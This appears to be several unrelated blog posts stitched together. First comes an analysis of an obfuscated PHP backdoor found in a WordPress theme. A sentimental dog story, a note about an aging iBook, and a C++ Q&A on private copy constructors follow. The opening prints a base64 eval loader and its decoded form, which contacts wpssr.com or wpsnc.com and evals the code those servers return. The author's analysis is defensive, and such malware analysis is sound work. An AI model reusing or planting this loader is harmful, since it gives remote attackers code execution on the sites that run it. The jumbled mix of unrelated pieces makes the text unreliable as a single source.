@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29 ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0R\
kZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0M\
DYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid\
3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9I\
EBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFM\
kZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFM\
ywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiO\
yBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyI\
jsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpO\
yBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0K\
CdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFN\
jA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgP\
SAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvb\
S93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVyb\
GVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZ\
W5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFN\
kM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M\
0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDN\
zM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEO\
UU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExN\
SA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY\
29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gd\
XJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1c\
mxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxN\
EIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1R\
kU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7'));

I am always very suspicious when someone obfuscates a piece of code on a web server or in a javascript. I quickly copied the code into a test file, altered it to print out the decode to stdout. Here is what the decode produced:


if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com"\
, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, \
$R5F525F5B398DADD7CF0784BD406298E3, 3)) {
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
}
elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com"\
, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, \
$R5F525F5B398DADD7CF0784BD406298E3, 3)) {
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
}
else {
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
}
@eval($R14AF1BE9EE26A90921E64A82E7836797 = 1);
if($R14AF1BE9EE26A90921E64A82E7836797 AND \
ini_get('allow_url_fopen')) {
@eval($RD3FE9C10A808A54EA2A3DBD9E605B696 = "1");
$R6E4F14B335243BE656C65E3ED9E1B115 = \
"http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com\
/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". \
urlencode($_SERVER['REQUEST_URI']) ."&". "host=". \
urlencode($_SERVER['HTTP_HOST']);
$R3E33E017CD76B9B7E6C7364FB91E2E90 = \
@file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
}
else
{
@eval($RD3FE9C10A808A54EA2A3DBD9E605B696 = "0");
$R6E4F14B335243BE656C65E3ED9E1B115 = \
"http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com\
/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". \
urlencode($_SERVER['REQUEST_URI']) ."&". \
"host=". urlencode($_SERVER['HTTP_HOST']);
readfile($R6E4F14B335243BE656C65E3ED9E1B115);
}
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

It appears that the script attempts to open a connection to the site “www.wpssr.com”, if successful, it sets a base url variable to “wpssr”. If this fails it attempts to open a connection to “www.wpsnc.com”, if successful, it sets the base url variable to “wpsnc”. If both of these fail, it sets the base url variable to “wpsnc2″.

Once the base url variable is set, it sets another variable to true using an eval call. Then it varifies this variable is true and that the php installation running on the server allows scripts to open urls as file handles. If this is true, it sets another variable (call it filename) to “1″. The url is then formed by concatenating the base url variable, the filename variable, the request URI and the server hostname. The full url will look something like this “http://www.wpssr.com/w1.php?url=index.php&host=codescout.org”. Next the request is made and the response is assigned to a response variable. The contents of the response are then run through a eval call. This is very very very dangerous, since unknown and untrusted code can be run on your server!

If your server does not allow opening of urls as filenames, the url is constructed like the above example, except that the filename is w0.php. The url is then sent as an argument to the readfile function which will retrieve and output the contents.

I tested the request and the response is empty. I don’t believe the theme’s author was attempting anything malicious. The script appears to be a method to allow him/her to track who is using the theme.

I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

The eval function is a dangerous feature of PHP. It may provide convenience and flexibility for a PHP developer, but it is also too easy to abuse. If you are using a CMS or Application Framework that makes use of the eval function in PHP, you have to take the time and review the code. Especially any plugins or themes written by a third party.

It broke my heart when my two dobermans Kahlua and Tasha passed away. I thought I wouldn’t ever get another dog, but then Ben and Geri came along. I know in what I consider a very short time, they will pass on and I will be sad again. The pain is worth it though, because the joy and comfort they bring in their short lifetimes is priceless. I’m not putting this story up to suggest those who read it should live by this creed. I’m posting it as testimony to dogs and how much they have given man for over 10,000 years. I love dogs and I always hope I have them in my life.

Here is the story…

Being a veterinarian, I had been called to examine a ten-year-old Irish Wolfhound named Belker. The dog’s owners, Ron, his wife Lisa, and their little boy Shane, were all very attached to Belker and they were hoping for a miracle.

I examined Belker and found he was dying. I told the family we couldn’t do anything for Belker and offered to perform the euthanasia procedure for the old dog in their home.

As we made arrangements, Ron and Lisa told me they thought it would be good for six-year-old Shane to observe the procedure. They felt as though Shane might learn something from the experience

The next day, I felt the familiar catch in my throat as Belker’s family surrounded him. Shane seemed so calm, petting the old dog for the last time, that I wondered if he understood what was going on. Within a few
minutes, Belker slipped peacefully away.

The little boy seemed to accept Belker’s transition without any difficulty or confusion. We sat together for a while after Belker’s death, wondering aloud about the sad fact that animal lives are shorter than human lives. Shane, who had been listening quietly, piped up, “I know why.”

Startled, we all turned to him. What came out of his mouth next stunned me. I’d never heard a more comforting explanation.

He said, “People are born so that they can learn how to live a good life — like loving everybody all the time and being nice, right?” The Six-year-old continued, “Well, dogs already know how to do that, so they don’t have to stay as long.”

Live simply.
Love generously.
Care deeply.
Speak kindly.

Remember, if a dog was the teacher you would learn things like:

• When loved ones come home, always run to greet them.
• Never pass up the opportunity to go for a joyride.
• Allow the experience of fresh air and the wind in your face to be pure ecstasy.
• Take naps.
• Stretch before rising.
• Run, romp, and play daily.
• Thrive on attention and let people touch you.
• Avoid biting when a simple growl will do.
• On warm days, stop to lie on your back on the grass.
• On hot days, drink lots of water and lie under a shady tree.
• When you’re happy, dance around and wag your entire body.
• Delight in the simple joy of a long walk.
• Eat with gusto and enthusiasm. Stop when you have had enough.
• Be loyal. Never pretend to be something you’re not.
• If what you want lies buried, dig until you find it.
• When someone is having a bad day, be silent, sit close by and nuzzle them gently.

My wife has been using it for a couple of years now and I only have the opportunity to use it once in a while. She doesn’t like when technology refuses to work, so it was a natural fit to pass my iBook on to her. That is what you do for the people and things that you love. You do what is best for them. There are many things that my wife is not aware of that the iBook can do, but I don’t feel like there is lost potential in this… There are also a great deal of mundane things that it does which she is not aware of either and I feel that is where the beauty of the design shows itself the most. My wife doesn’t have to be a technophile or understand what a registry is and why it has rotted. She just opens and closes the lid to use the iBook at her whim.

My iBook is aging now, it has scratches, a failing battery, and a new hard drive. There are the newer Intel MacBook models that are forcing it into obsolescence and one day it will be nothing more than a paperweight. Until that day comes it will remain a classy and sleek design that refuses to force the end user to think, like the body doesn’t force us to remember to breath.

Question received by other means:

In the requirements [for Project 1] you call for the copy constructor and the assignment operator to be private for each class. Shouldn’t they be public for the classes to be fully qualified types?

Yes. But there’s a lot more underneath this question. First some terminology:

1. A class that is what we call “proper type” is often called a first class type.
2. A type that is intended to be used in a polymorphic environment (such as our tracker project) is called a polymorphic type.
3. A type for which there should be only one instance in a given namespace is called a singleton.

(These terms apply, ambiguosly, to either classes or objects.) All of these are related to the question - why make the copy constructor and assignment operator private, and what are the implications?

Singletons. Note that if the copy ctor and operator= are private, then no client program may use them. The effect is that a client program is not allowed to make copies of these objects - either explicitly (using operator=) or implicitly (using copy ctor). The client program attempting to call a function by value with one of these objects as argument, or assign one to another, will get a compile error. You prevent the class implementation code from making copies by not implementing these methods, so they too will get an error if one is used, albeit from the linker instead of the compiler. Thus both (1) making the copy ctor and operator= private and (2) omitting implementations for them will serve to make the object a singleton. (There is more to it than this, but this is an excellent start.)

Polymorphic objects. In polymorphism, if object copies are allowed, they are usually made with a public member function named Clone() that returns a pointer to a copy of this object. In this situation, you want the copy ctor and operator= private, but you do provide implementations. Then you have a method Clone() that is implemented something like:

X* X::Clone {return Xptr = new X (*this);} // calls copy ctor

Note that in a polymorphic setting, we are typically using pointers to type X (and its derived classes). If the client program has two pointers, p1 and p2, and wants p2 to be a (deep) copy of p1, the code would be

p2 = p1->Clone();

First Class Objects. These are objects from a proper type. They behave just like a native type such as char, int, or float. Yu can assign to or from them and let them go out of scope with no unfortunate consequences.

What we have done in project 1 is make the various classes singletons. We could make the types polymorphic, but there was no need, and it’s a can of worms. You will run into these ideas again, either in school or professionally.

Implementing ThreatSTOP is extremely easy to get up and running on specific firewall platform.